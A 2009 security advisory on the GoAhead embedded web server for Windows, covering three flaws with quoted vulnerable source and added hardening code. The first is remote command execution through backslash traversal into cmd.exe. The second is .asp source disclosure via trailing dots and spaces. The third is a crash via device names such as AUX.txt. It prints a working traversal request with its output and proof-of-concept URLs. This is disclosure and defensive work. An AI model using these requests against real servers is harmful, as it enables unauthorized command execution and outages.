
GoAhead embedded http server - multiple vulnerabilities (windows)

About GoAhead http server

The server is an open-source "embedded web server" solution, as described here.

It is commonly used in SOHO-class routers (we saw it on Linux-based routers).

But the server can be used on a variety of platforms, including Linux and Windows (more info here).

The following flaws are presented to show that popular embedded http servers are not necessarily heavily secured...

Flaws

We found multiple vulnerabilities in the newest version of the http server (2.1.8) compiled for the Windows platform.

Shell execution

UPDATE [01.06.2009]: As we noticed, the bug was reported (by Sergey Nenashev <alf@ntvi.ru>) a long time ago. See:

http://www.securityfocus.com/bid/2334

But it seems that the vendor did not care about it.

We provide the info here to stress that the bug can be found in "live" boxes using this web server.

---


The server once had a directory traversal issue on Windows, which seems to be fixed.

But there is an even more serious vulnerability: OS command execution.

When you combine directory traversal with the cgi module you get:

HTTP REQUEST:

GET /cgi-bin/..\..\..\..\..\..\..\..\..\windows\system32\cmd.exe?/k+c:\windows\system32\ping.exe+127.0.0.1 HTTP/1.0

HTTP RESPONSE:

HTTP/1.0 200 OK
[...]
Odpowiedz z 127.0.0.1: bajtów=32 czas<1 ms TTL=128

Statystyka badania ping dla     :
    Pakiety: Wyslane = 4, Odebrane = 4, Utracone = 0 (0% straty),
Szacunkowy czas bladzenia pakietów w millisekundach:
    Minimum = 0 ms, Maksimum = 0 ms, Czas sredni = 0 ms

C:\webs1\WIN>

Comment:

On Windows systems the '\' character can also be used as a directory separator.
In the cgi module (cgi.c), the anti-directory-traversal check is only implemented for the '/' character (see below).

cgi.c

65:    if ((cgiName = gstrchr(&cgiBuf[1], '/')) == NULL) {
           websError(wp, 200, T("Missing CGI name"));
           return 1;
       }
       cgiName++;
70:    if ((cp = gstrchr(cgiName, '/')) != NULL) {
           *cp = '\0';
       }
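The root cause is that the name is cut only at '/', so a component written with backslashes survives intact and is later used as a file name. The following is an added example written for this page, not GoAhead source: slash_only_cgi_name re-expresses the quoted logic in plain C for comparison, and extract_cgi_name is a hardened replacement that treats both '/' and '\' as separators and refuses the "." and ".." components outright. The request paths in main() are constructed for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* True if c is a directory separator on Windows (both forms are accepted by the OS). */
static int is_sep(char c)
{
    return c == '/' || c == '\\';
}

/* Mirror of the '/'-only logic quoted above from cgi.c, rewritten here in plain C
 * for comparison (this is not the vendor's source). A backslash-separated path is
 * treated as a single name and copied through unchanged. */
int slash_only_cgi_name(const char *path, char *out, size_t outlen)
{
    const char *name = strchr(path + 1, '/');   /* skip "/cgi-bin" */
    const char *end;
    size_t n;

    if (name == NULL)
        return 0;                               /* "Missing CGI name" */
    name++;
    end = strchr(name, '/');                    /* cut only at a forward slash */
    n = end ? (size_t)(end - name) : strlen(name);
    if (n >= outlen)
        return 0;
    memcpy(out, name, n);
    out[n] = '\0';
    return 1;
}

/* Hardened variant: the CGI name ends at the first separator of either kind, and
 * relative components are rejected. Returns 1 and fills out on success, 0 otherwise. */
int extract_cgi_name(const char *path, char *out, size_t outlen)
{
    const char *p, *name;
    size_t n = 0;

    if (path == NULL || path[0] == '\0')
        return 0;
    /* Skip the "/cgi-bin" prefix: the CGI name starts after the next separator. */
    for (p = path + 1; *p != '\0' && !is_sep(*p); p++)
        ;
    if (*p == '\0')
        return 0;                               /* missing CGI name */
    name = p + 1;
    while (name[n] != '\0' && !is_sep(name[n]))
        n++;
    if (n == 0 || n >= outlen)
        return 0;                               /* empty name or too long */
    memcpy(out, name, n);
    out[n] = '\0';
    /* A CGI lookup needs a bare file name; "." and ".." are never legitimate here. */
    if (strcmp(out, ".") == 0 || strcmp(out, "..") == 0)
        return 0;
    return 1;
}

int main(void)
{
    /* Constructed sample requests: one benign, one using backslash traversal. */
    const char *requests[] = {
        "/cgi-bin/test.cgi/extra",
        "/cgi-bin/..\\..\\windows\\system32\\cmd.exe",
    };
    char out[128];
    size_t i;

    for (i = 0; i < sizeof requests / sizeof requests[0]; i++) {
        printf("%s\n", requests[i]);
        if (slash_only_cgi_name(requests[i], out, sizeof out))
            printf("  slash-only logic accepts: \"%s\"\n", out);
        else
            printf("  slash-only logic rejects\n");
        if (extract_cgi_name(requests[i], out, sizeof out))
            printf("  hardened logic accepts:   \"%s\"\n", out);
        else
            printf("  hardened logic rejects\n");
    }
    return 0;
}
```

Rejecting the name is only half of the fix; the resulting path should also be opened relative to the CGI directory and checked after canonicalization, so that an encoded or mixed-separator component cannot reappear later in the pipeline.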


Script source disclosure

Windows systems can be a bit tricky when it comes to naming files: trailing dots or spaces are truncated when a file is accessed or created.

More specifically, see: http://msdn.microsoft.com/en-us/library/aa365247.aspx 

"Do not end a file or directory name with a trailing space or a period. Although the underlying file system may support such names, the operating system does not. However, it is acceptable to start a name with a period."

For example:

D:\tmp>mkdir "test.. ."

D:\tmp>dir
 Wolumin w stacji D to Nowy
 Numer seryjny woluminu: 5C0B-7FC0

 Katalog: D:\tmp

2009-01-24  11:59    <DIR>          .
2009-01-24  11:59    <DIR>          ..
2009-01-24  11:59    <DIR>          test
               0 plik(ów)               0
               3 katalog(ów)  53 613 948 928 bajtów wolnych

So, when requesting an .asp file with dot(s) and/or space(s) appended, you get the source of the file.

For example, you make a request to "home.asp.. .":

  • the webserver detects that the request is not for a .asp file (the name does not end with ".asp").
  • the "open file" request is passed to the OS, and the OS strips the name to "home.asp".
  • home.asp is served as plain text.


Affected file: web.c

792:    if (gstrcmp(ext, T(".asp")) == 0) {
            wp->flags |= WEBS_ASP;
        }

http server DoS

Again, http://msdn.microsoft.com/en-us/library/aa365247.aspx is a handy resource.

We read there: "Do not use the following reserved device names for the name of a file:
CON, PRN, AUX, NUL, COM1, COM2, COM3, COM4, COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4, LPT5, LPT6, LPT7, LPT8, and LPT9.
Also avoid these names followed immediately by an extension; for example, NUL.txt is not recommended."

Well, the problem was once addressed in the webserver. There is a protective function called "isBadWindowsPath", which blacklists the following words:

default.c

316:         if (
                 (badPath(parts[i], T("con"), 3)) ||
                 (badPath(parts[i], T("nul"), 3)) ||
                 (badPath(parts[i], T("aux"), 3)) ||
                 (badPath(parts[i], T("clock$"), 6)) ||
                 (badPath(parts[i], T("config$"), 7))

Unfortunately, it does not protect against requests in one specific context (accessing a blacklisted *file*, not a blacklisted directory):

PoC:

Accessing AUX.txt crashes the webserver (http://host/AUX.txt)

Accessing COM1.txt does the same (and possibly the other COM and LPT names as well) (http://host/COM1.txt).

Note that COM is not even blacklisted in the isBadWindowsPath function.
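Both the source disclosure above and this crash come from the same gap: the server checks the name as written in the request, while the Windows file system opens a different name (trailing dots and spaces removed, device names resolved regardless of extension or case). The following is an added example for this page, not GoAhead code: it canonicalizes one path component the way Win32 will before any extension check runs, and rejects the full reserved device name list from the MSDN page quoted above, with or without an extension and in any letter case. ext_is_asp plays the role of the ".asp" check in web.c; the sample names in main() are constructed.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Strip trailing dots and spaces in place, mirroring what Win32 does to a
 * name before opening it ("home.asp.. ." becomes "home.asp"). */
void win_trim_trailing(char *name)
{
    size_t n = strlen(name);
    while (n > 0 && (name[n - 1] == '.' || name[n - 1] == ' '))
        name[--n] = '\0';
}

/* Case-insensitive comparison of exactly len characters. */
static int ieq(const char *a, const char *b, size_t len)
{
    size_t i;
    for (i = 0; i < len; i++)
        if (tolower((unsigned char)a[i]) != tolower((unsigned char)b[i]))
            return 0;
    return 1;
}

/* Returns 1 if the component is a reserved DOS device name from the MSDN list
 * (CON, PRN, AUX, NUL, COM1-COM9, LPT1-LPT9), optionally followed by an
 * extension such as "AUX.txt". Only the stem before the first dot matters. */
int is_reserved_device_name(const char *component)
{
    static const char *const names[] = { "con", "prn", "aux", "nul" };
    const char *dot = strchr(component, '.');
    size_t stem = dot ? (size_t)(dot - component) : strlen(component);
    size_t i;

    if (stem == 3) {
        for (i = 0; i < sizeof names / sizeof names[0]; i++)
            if (ieq(component, names[i], 3))
                return 1;
    }
    /* COM1..COM9 and LPT1..LPT9: three letters plus a single digit 1-9. */
    if (stem == 4 && component[3] >= '1' && component[3] <= '9' &&
        (ieq(component, "com", 3) || ieq(component, "lpt", 3)))
        return 1;
    return 0;
}

/* The extension test as web.c applies it, here case-insensitive since Windows is. */
int ext_is_asp(const char *name)
{
    const char *ext = strrchr(name, '.');
    return ext != NULL && strlen(ext) == 4 && ieq(ext, ".asp", 4);
}

/* Canonicalize the requested name into canon and classify it:
 *  1  handled as ASP (after trimming, so "home.asp.. ." is still ASP)
 *  0  ordinary file
 * -1  reserved device name, must not be opened
 * -2  name too long for the buffer */
int classify_request(const char *requested, char *canon, size_t canonlen)
{
    if (strlen(requested) >= canonlen)
        return -2;
    strcpy(canon, requested);
    win_trim_trailing(canon);
    if (is_reserved_device_name(canon))
        return -1;
    return ext_is_asp(canon) ? 1 : 0;
}

int main(void)
{
    /* Constructed sample requests covering the three cases discussed in the text. */
    const char *samples[] = { "home.asp", "home.asp.. .", "AUX.txt", "COM1.txt", "index.html" };
    char canon[64];
    size_t i;

    for (i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int r = classify_request(samples[i], canon, sizeof canon);
        printf("\"%s\" -> canonical \"%s\", raw .asp check %d, classification %d\n",
               samples[i], canon, ext_is_asp(samples[i]), r);
    }
    return 0;
}
```

The order matters: trimming first means a request such as "aux " or "con.txt." is recognised as a device name even though the raw string does not match any blacklist entry, and the extension decision is made on the name the OS will actually open rather than on the one the client typed.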

Vendor's reaction / issue history

  • The research was performed in late 2008.
  • The vendor was notified on 01.2009.
  • No reasonable response or fix so far.
  • 15.05.2009 - public disclosure

Research / contact

  • We are performing research on web management interfaces on network appliances. If you want to help, feel free to contact us at devices_hacking@securitum.pl

Disclaimer

  • All the information is provided for educational use only.
  • We strongly discourage using the information for cracking purposes.
  • We are not responsible for damages made to your router - play with your router carefully.


Michal Sajdak
michal.sajdak@securitum.pl
